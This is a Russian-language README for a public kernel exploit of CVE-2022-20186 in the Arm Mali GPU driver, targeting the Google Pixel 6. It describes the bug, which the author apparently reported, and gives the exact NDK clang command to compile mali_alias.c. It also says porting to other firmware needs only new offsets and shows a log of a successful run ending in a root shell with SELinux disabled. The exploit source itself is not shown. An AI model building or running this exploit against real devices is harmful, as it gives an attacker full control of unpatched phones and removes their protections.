
Эксплойт для CVE-2022-20186 в драйвере ядра Arm Mali, достигающий произвольного выполнения кода ядра для отключения SELinux и получения root на Google Pixel 6.
Статья доступна здесь. Это ошибка в драйвере ядра Arm Mali, о которой я сообщил в январе 2022 года. Уязвимость может быть использована для получения произвольного выполнения кода в ядре из домена ненадёжных приложений, что затем используется для отключения SELinux и получения прав root.
Эксплойт протестирован на Google Pixel 6 и поддерживает уровни исправлений с ноября 2021 по февраль 2022. Легко добавить поддержку для других прошивок, изменив несколько смещений образов. Для справки, я использовал следующую команду для компиляции с помощью clang в ndk-21:
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias
Эксплойт редко даёт сбой и может быть повторён без сбоя устройства. В случае успеха он отключает SELinux и получает root-доступ.
oriole:/ $ /data/local/tmp/mali_alias
fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
tracking page 0x6ff794e000
drain 0x6d5b200000
gpu_va[0] 6ff6698000
gpu_va[1] 6ff6695000
alias 0x6ff6693000
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
oriole:/ #